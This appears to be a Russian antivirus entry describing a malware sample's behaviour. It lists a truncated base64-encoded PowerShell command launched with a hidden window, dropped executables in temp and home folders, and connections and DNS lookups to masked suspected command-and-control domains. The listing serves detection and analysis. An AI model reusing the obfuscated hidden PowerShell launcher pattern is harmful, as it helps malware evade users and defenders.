Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABzAG8AUQBBAEMAbwBBAEEAPQAoACgAJwBqACcAKwAnADEAQwAnACkAKwAnAFgAJwArACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBHADEAJwAsACcAQQBBACcAKQApADsAJABoAEEAMQBRAFEAQwBRAEIAIAA9ACAAKAAnADgAMgAnACsAJwA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1540
- %TEMP%\1177152.cvr
- %HOMEPATH%\820.exe
- 'pr###min.com':443
- 'mo###blog.com':443
- 'ch###enxu.com':80
- 'ei##v.org':80
- 'ei##v.org':443
- 'pr###min.com':443
- 'ei##v.org':443
- DNS ASK pr###min.com
- DNS ASK mo###blog.com
- DNS ASK ch###enxu.com
- DNS ASK gl###lent.pk
- DNS ASK ei##v.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABzAG8AUQBBAEMAbwBBAEEAPQAoACgAJwBqACcAKwAnADEAQwAnACkAKwAnAFgAJwArACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBHADEAJwAsACcAQQBBACcAKQApADsAJABoAEEAMQBRAFEAQwBRAEIAIAA9ACAAKAAnADgAMgAnACsAJwA...' (со скрытым окном)